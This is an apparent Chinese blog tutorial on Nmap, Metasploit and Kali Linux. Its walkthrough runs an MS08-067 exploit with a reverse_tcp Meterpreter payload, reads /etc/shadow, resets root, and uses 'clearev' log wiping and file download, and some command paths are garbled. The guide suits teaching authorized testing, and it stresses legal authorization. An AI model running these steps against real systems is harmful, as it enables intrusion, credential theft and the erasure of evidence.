Nmap、Metasploit与Kali Linux深度解析
超级会员免费看
网络安全工具:Nmap、Metasploit与Kali Linux的深度解析
1. Nmap:网络扫描的利器
1.1 发展历程
Nmap于1997年9月首次在在线杂志Phrack Magazine上发布,由Gordon Lyon(化名Fyodor Vaskovich)创建。最初版本未编号,因其受欢迎程度和高需求,后续不断有新版本推出。例如,仅4天后v1.25版本发布,1998年12月版本2.00发布,2000年4月版本2.50包含ACK扫描,2000年12月首个Windows版本Nmap v2.45Beta16发布。2002年8月程序代码从C语言重写为C++语言,并增加了对IPv6的支持。2004年2月版本3.50发布,包含数据包跟踪和UDP ping。2005年夏天出现了如Zenmap、Ncat和NSE等附加工具,同年9月版本3.90包含ARP扫描和MAC地址欺骗。2009年3月30日发布特殊版本4.85beta5用于检测Conficker蠕虫,2011年1月28日版本5.50发布,包含nping包的生成和更多NSE脚本,2012年5月版本6.00具备完整的IPv6支持。
1.2 重要性
Nmap最初是作为基本网络的扫描器开发的,但每个新版本都增加了更多功能,其社区也日益壮大。它被认为是系统管理员、安全审计员和黑客最重要(且必不可少)的工具之一,因为它能够以有效(且隐蔽)的方式从网络中获取大量信息。
1.3 有趣之处
Nmap还出现在如《大逃杀》《13:死亡游戏》《黑客帝国:重装上阵》《水晶丛林4》或《谍影重重3》等电影中。
2. Metasploit:漏洞测试框架
2.1 简介
Metasploit是一个框架,可用于开发、配置和执行针对目标系统的漏洞利用程序,以进行适当的渗透测试。它包含900多种不同的漏洞利用程序,主要来自Windows操作系统,也有适用于MacOsX和Unix/Linux的。除了漏洞利用程序,它还包含可利用这些漏洞的有效负载、库和各种可用于攻击的接口。它用Ruby编程语言编写,是免费软件,有适用于Linux和Windows的版本。
2.2 操作步骤
2.2.1 信息收集
使用Msfconsole环境,通过在控制台输入
help
命令查看选项。若使用Metasploit数据库,可在菜单“Applications Kali >> Applications >> System Services >> Community >> Metasploit Pro Start”中找到。首先应收集目标系统的信息,此阶段通常称为识别阶段。可使用nmap工具完成此任务,也可直接从Metasploit使用
db_nmap
命令,其操作与nmap类似(使用相同参数)。获取IP地址、服务、端口等信息后,可决定攻击目标。
2.2.2 查找漏洞利用程序
若要查看Metasploit中可用的漏洞利用程序,可输入
show exploits
命令,会显示所有可用的漏洞利用程序列表。也可使用
search
命令搜索漏洞利用程序。选择要使用的漏洞利用程序后,使用
use [exploit]
命令激活,例如使用
use windows / smb / ms08_067_netapi
。
2.2.3 选择有效负载
激活漏洞利用程序后,使用
show payloads
操作查看与该漏洞利用程序兼容的有效负载列表。输入
show options
可查看选项,大多数选项已具有默认值,但可使用
set [option] [parameters]
命令进行调整。通过
set RHOST [target ip]
和
set LHOST [our IP]
指定目标机器和自己的IP地址,然后使用meterpreter利用漏洞。
2.3 工作原理
Metasploit Framework具有模块化架构,每个漏洞利用程序集成到框架中,通过加载和配置命令与框架(以及其他模块,如有效负载)进行交互。
2.4 常用选项
| 选项 | 功能 |
|---|---|
| Back | 下载当前模块 |
| Connect | 小型netcat,允许SSL、文件发送、代理等 |
| Edit | 允许编辑(默认使用Vim)加载的模块 |
| Help | 显示命令 |
| Info | 显示加载模块的大量信息(选项、目标、作者、许可证、参考、限制等) |
| Irb | 显示一个Ruby解释器,允许创建脚本 |
| Jobs | 显示在后台运行的模块 |
| Load | 加载插件 |
| Unload | 移除插件 |
| Route | 允许创建套接字 |
| Search | 搜索(模块、描述、参考等) |
| Sessions | 允许列出、交互和结束会话(shell、meterpreter、VNC等) |
| Set | 设置选项 |
| Setg | 配置模块中的常用选项(如LHOST或RHOST),若使用save选项,可保存供其他会话使用 |
| Show | 显示Metasploit的模块/选项等 |
| Use | 加载模块 |
2.5 Meterpreter:有效负载的使用
2.5.1 操作示例
使用Meterpreter利用漏洞,激活漏洞利用程序和有效负载后,提示符将从msfconsole的
msf
变为指示meterpreter。输入
ps
命令可查看目标机器上的活动进程。
2.5.2 选项列表
| 选项 | 功能 |
|---|---|
| Help | 显示meterpreter选项 |
| Background |
将当前meterpreter会话发送到后台(返回Metasploit的起始
msf>
提示符)
|
| Cat | 显示文件内容(如Linux的cat命令) |
| Cd | 更改目录(如MsDos和Linux的cd命令) |
| Pwd | 显示当前目录 |
| Clearev | 清理Windows操作系统的应用程序、系统和安全日志 |
| Download |
下载目标文件(对Windows操作时需要双斜杠
\\
)
|
| Edit | 在目标上用Vim打开文件 |
| Execute | 在目标上执行命令 |
| Getuid | 显示Meterpreter正在使用的用户 |
| Idletime | 显示目标机器已运行的时间 |
| Ipconfig | 显示目标的网络配置(如Windows的相同选项) |
| Ls | 显示当前目录的文件(如Linux的ls命令) |
| Migrate | 切换到另一个进程 |
| Ps | 给出活动进程列表 |
| Resource | 执行写在文本文件中的meterpreter命令 |
| Shell | 在目标上打开终端 |
2.5.3 工作原理
Meterpreter是一个与所使用的漏洞利用程序一起工作的有效负载,不创建新进程,因此更有效(且隐蔽)。它使用DLL注入和stagers,操作过程如下:
graph LR
A[攻击者] -->|发送漏洞利用程序和第一阶段| B[目标]
B -->|实现利用后| C[Stager加入目标任务并尝试与mfsconsole通信]
C -->|建立连接后| D[发送第二阶段]
D -->|正确执行DLL注入| E[Metasploit发送DLL meterpreter建立通信通道]
E -->|加载必要扩展| F[完成操作]
2.6 模块
Metasploit Framework包含以下模块:
-
Auxiliary module
:允许外部工具(如漏洞扫描器、嗅探器等)与Metasploit框架进行交互。
-
Encoders module
:提供算法对有效负载进行编码和混淆,使其难以理解。
-
Exploits module
:包含框架中所有可用于访问不同操作系统的漏洞利用程序。
-
Payloads module
:提供大量可在漏洞利用成功后远程执行的代码。
-
Post module
:为后利用阶段提供功能。
-
Nops module
:确保有效负载的连接和数据流量保持恒定。
3. Kali Linux:渗透测试的平台
3.1 简介
Kali Linux是著名的Linux BackTrack发行版的新一代,用于进行安全审计和渗透测试。它基于GNU/Linux Debian,是BackTrack的完全重建,包含大量用于捕获信息、识别漏洞、利用漏洞、提升权限和掩盖痕迹的工具。
3.2 特点
- 完全重建BackTrack Linux,完全遵循Debian开发标准。
- 拥有全新的基础设施,所有工具都经过检查和打包,使用Git进行版本控制。
- 包含300多种渗透测试工具。
- 免费且永远免费。
- 开源的Git树。
- 符合FHS(文件系统层次结构标准)。
- 对无线设备有广泛支持。
- 有用于注入的内核补丁。
- 安全的开发环境。
- 包和存储库使用GPG签名。
- 支持多种语言。
- 完全可定制。
- 支持ARMEL和ARMHF。
3.3 下载方式
Kali Linux可针对不同架构进行下载,如i386、amd64和armel、armhf。对于i484、i686和amd64,可下载ISO镜像或VMWare虚拟机,也可通过直接下载或Torrent下载。
3.4 安装选项
Kali Linux可像任何GNU/Linux发行版一样安装在硬盘上,也可配置为与Windows操作系统进行双启动,还可安装在USB驱动器或加密磁盘上。详细的安装选项信息可查看:http://docs.kali.org/category/installation
3.5 更改root密码
为了良好的安全实践,建议更改分配给root用户的默认密码,可使用以下命令:
# passwd root
Enter new UNIX password:
Retype new UNIX password:
密码输入时不会显示,需输入两次。
3.6 启动网络服务
Kali Linux的网络服务包括HTTP、Metasploit、MySQL、OpenVAS和SSH。若需要启动HTTP服务,可执行以下命令:
# /etc/init.d/apache2 start
这些服务也可从菜单“Applications -> Kali Linux -> System Services”启动和停止。Kali Linux的官方文档可在http://docs.kali.org/ 找到。
3.7 工具列表
Kali Linux包含大量来自不同安全和取证领域的工具,所有工具列表及快速参考可在http://tools.kali.org/ 查看。
3.8 脚本编写示例
使用Shell Bash可自动化操作或执行耗时的重复任务。以下示例使用一个发布代理列表的网站,通过bash shell命令提取代理的IP地址和端口到文件:
# wget http://www.us-proxy.org/
# grep “<tr> <td>” index.html | cut -d “>” -f 3,5 | cut -d “<” -f 1,2 | sed ‘s / <\ / td> /: / g’
3.9 信息捕获
信息捕获阶段尝试收集关于目标的尽可能多的信息,如可能的用户名、IP地址、名称服务器等。此过程可分为主动信息捕获和被动信息捕获:
-
主动信息捕获
:通过向目标网络发送流量来收集信息,如执行ICMP ping和TCP/UDP端口扫描。
-
被动信息捕获
:使用第三方服务或来源(如Google、Bing或社交网络)获取目标网络的信息。
3.10 公共资源
互联网上有各种公共资源可用于收集目标信息,使用此类资源的优点是不会向目标产生直接流量,从而降低被检测的概率。
3.11 捕获文档工具
- dnsenum :使用“-dnsserver”选项指定用于主机名查询的特定DNS服务器,“-dns”选项定义要扫描的域,“-wordlist”选项定义用于发现子域的单词列表,“-file”选项定义输出文件。
- Dmitry :是一个Linux的在线命令程序,可从简单的Whois查询到运行时间报告或端口扫描等,尽可能多地捕获关于主机的信息。示例命令如下:
# dmitry -w -e -n -s [Domain] -o /tmp/resultado_dmitry.txt
其中,“-w”选项允许对主机的IP地址进行Whois查询,“-e”选项允许搜索所有可能的电子邮件地址,“-n”选项尝试从Netcraft获取主机信息,“-s”选项允许搜索可能的子域,“-o”选项允许定义保存结果的文件名。不过,通过dmitry获取Netcraft相关信息不可行,可直接从Netcraft网站http://searchdns.netcraft.com 获取。
3.12 路由信息工具
- Traceroute :跟踪IP网络数据包到指定主机的路由,使用IP协议的“TTL”字段并尝试从路由中的每个网关引发ICMP响应TIME_EXCEEDED。GNU/Linux系统上的traceroute版本默认使用UDP数据包。示例命令如下:
# traceroute —help
# traceroute [IP Address]
- Tcptraceroute :使用TCP数据包跟踪到目标主机的路由。示例命令如下:
# tcptraceroute —help
# tcptraceroute [IP Address]
3.13 使用搜索引擎工具
- Theharvester :可用于收集目标信息。
- Nping :默认使用ICMP协议,若目标主机阻止此协议,可使用TCP测试模式。示例命令如下:
# nping -h
# nping [IP Address]
# nping —tcp [IP Address]
3.14 操作系统识别
使用nmap的“-O”选项可尝试确定活动目标上运行的操作系统类型和版本,示例命令如下:
# nmap -O [IP Address]
3.15 服务列表确定
使用nmap的“-sV”选项可确定每个特定端口上运行的服务,示例命令如下:
# nmap -sV [IP Address]
该选项启用版本检测,在使用nmap的某些扫描发现TCP和UDP端口后,版本检测会询问这些端口以确定当前运行的内容。数据库包含用于查询各种服务的测试和对应表达式,以识别和解释响应,nmap尝试确定服务协议、应用程序名称、版本号、主机名和设备类型。
3.16 目标利用
发现主机或目标网络的漏洞后,即可尝试利用这些漏洞。利用阶段有时会结束渗透测试过程,但这取决于合同,有些情况下需要更深入地进入目标网络,以扩大攻击范围并获取所有可能的权限。
3.17 漏洞利用程序仓库
每天都会报告各种类型的漏洞,但目前只有一小部分被公开或免费发布。一些“漏洞利用程序”可从维护仓库的网站下载。
3.18 Metasploit框架控制台
Metasploit控制台(msfconsole)主要用于管理Metasploit数据库、管理会话以及配置和执行Metasploit模块,其主要目的是进行利用。由于Metasploit Framework使用PostgreSQL作为数据库,首先需要启动该服务,然后启动Metasploit Framework控制台:
# service postgresql start
# netstat -tna | grep 5432 # 验证服务是否正确启动
# msfconsole -h # 显示Metasploit Framework帮助
# msfconsole
与控制台交互的一些有用命令如下:
| 命令 | 功能 |
| ---- | ---- |
| msf> help | 显示命令 |
| msf> search [Module Name] | 搜索模块 |
| msf> use [Module Name] | 使用模块 |
| msf> set [Option Name] [Module Name] | 设置选项 |
| msf> exploit | 执行利用 |
| msf> run | 运行 |
| msf> exit | 退出 |
3.19 Metasploit CLI
Metasploit CLI(msfcli)是允许Metasploit Framework执行任务的接口之一,是学习管理Metasploit Framework或评估/编写新漏洞利用程序的好接口,也适用于脚本和任务自动化。示例命令如下:
# msfcli -h
# msfcli
# msfcli [Exploit Route] [Option = Value]
3.20 利用演示和后利用
以下演示可加强对一些工具的使用,重点关注利用和后利用阶段,即攻击者在利用漏洞进入系统后会执行的过程。例如,使用本地漏洞利用程序提升权限的演示:
# ssh -l msfadmin 192.168.159.129
# sudo cat / etc / shadow
# sudo passwd root
# id
后利用阶段与第一个示例类似。
通过以上介绍,我们可以看到Nmap、Metasploit和Kali Linux在网络安全和渗透测试领域的重要性和强大功能,合理使用这些工具可以帮助我们更好地保护网络安全或进行合法的安全测试。
4. 综合应用案例分析
4.1 渗透测试流程示例
为了更清晰地展示如何综合运用Nmap、Metasploit和Kali Linux进行渗透测试,下面给出一个完整的流程示例。
graph LR
A[信息收集] -->|使用Nmap、Dmitry等| B[目标识别]
B -->|确定漏洞| C[漏洞利用]
C -->|使用Metasploit| D[权限提升]
D -->|使用本地漏洞利用程序| E[后利用操作]
E -->|清理痕迹等| F[结束测试]
4.1.1 信息收集阶段
在这个阶段,我们会使用多种工具来获取目标系统的详细信息。
- 使用Nmap进行端口扫描和服务识别:
# nmap -sV -O [IP Address]
- 使用Dmitry收集主机信息:
# dmitry -w -e -n -s [Domain] -o /tmp/resultado_dmitry.txt
4.1.2 目标识别阶段
根据信息收集的结果,分析目标系统可能存在的漏洞。例如,如果发现目标系统运行着特定版本的服务,我们可以通过搜索引擎或漏洞数据库查找该服务的已知漏洞。
4.1.3 漏洞利用阶段
使用Metasploit来利用发现的漏洞。以下是一个利用
ms08_067_netapi
漏洞的示例:
# msfconsole
msf> search ms08_067_netapi
msf> use windows / smb / ms08_067_netapi
msf exploit (ms08_067_netapi)> show payloads
msf exploit (ms08_067_netapi)> set payload windows/meterpreter/reverse_tcp
msf exploit (ms08_067_netapi)> set RHOST [target ip]
msf exploit (ms08_067_netapi)> set LHOST [our IP]
msf exploit (ms08_067_netapi)> exploit
4.1.4 权限提升阶段
成功利用漏洞进入目标系统后,可能需要提升权限以获得更多的控制权。可以使用本地漏洞利用程序来实现这一目标,例如:
# ssh -l msfadmin 192.168.159.129
# sudo cat / etc / shadow
# sudo passwd root
4.1.5 后利用操作阶段
在获得足够的权限后,可以进行一些后利用操作,如安装后门、收集敏感信息等。同时,要注意清理操作痕迹,避免被发现。
# meterpreter> clearev
# meterpreter> download /path/to/sensitive/file /local/path
4.2 常见问题及解决方法
在使用这些工具进行渗透测试的过程中,可能会遇到一些常见问题,以下是一些解决方法的列表:
| 问题 | 解决方法 |
|---|---|
| Nmap扫描结果不准确 | 检查扫描参数是否正确,尝试使用不同的扫描模式;确保目标系统没有防火墙或入侵检测系统阻止扫描 |
| Metasploit无法连接到目标 | 检查目标IP地址和端口是否正确;确保目标系统没有防火墙阻止连接;检查Metasploit的配置是否正确 |
| Kali Linux网络服务无法启动 | 检查服务配置文件是否正确;检查网络连接是否正常;尝试重新启动服务 |
5. 安全建议与最佳实践
5.1 合法合规使用
在使用Nmap、Metasploit和Kali Linux进行渗透测试时,必须确保获得了目标系统所有者的明确授权。未经授权的渗透测试是违法的行为,可能会导致严重的法律后果。
5.2 安全防护意识
在进行渗透测试的同时,也要注重自身系统的安全防护。及时更新Kali Linux系统和工具,安装必要的防火墙和入侵检测系统,避免在测试过程中泄露自己的信息。
5.3 漏洞修复与预防
在发现目标系统的漏洞后,应及时向系统所有者报告,并提供详细的漏洞信息和修复建议。同时,要加强自身系统的安全管理,定期进行漏洞扫描和修复,预防类似漏洞的出现。
5.4 持续学习与更新
网络安全领域发展迅速,新的漏洞和攻击技术不断涌现。因此,要持续学习和更新自己的知识,关注行业动态,掌握最新的安全技术和工具。
6. 总结
本文详细介绍了Nmap、Metasploit和Kali Linux这三款在网络安全和渗透测试领域非常重要的工具。Nmap作为网络扫描的利器,能够帮助我们快速准确地获取目标系统的信息;Metasploit是一个强大的漏洞测试框架,提供了丰富的漏洞利用程序和有效负载;Kali Linux则是一个专门为渗透测试设计的操作系统,集成了大量的安全工具。
通过综合运用这些工具,我们可以进行全面的渗透测试,发现目标系统的漏洞并进行修复,从而提高网络系统的安全性。同时,我们也要始终遵守法律法规,合法合规地使用这些工具,为网络安全事业做出贡献。
在实际应用中,我们可以根据具体的需求和场景,灵活选择和组合使用这些工具,不断提高自己的渗透测试技能和水平。希望本文能够对大家在网络安全和渗透测试方面有所帮助。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
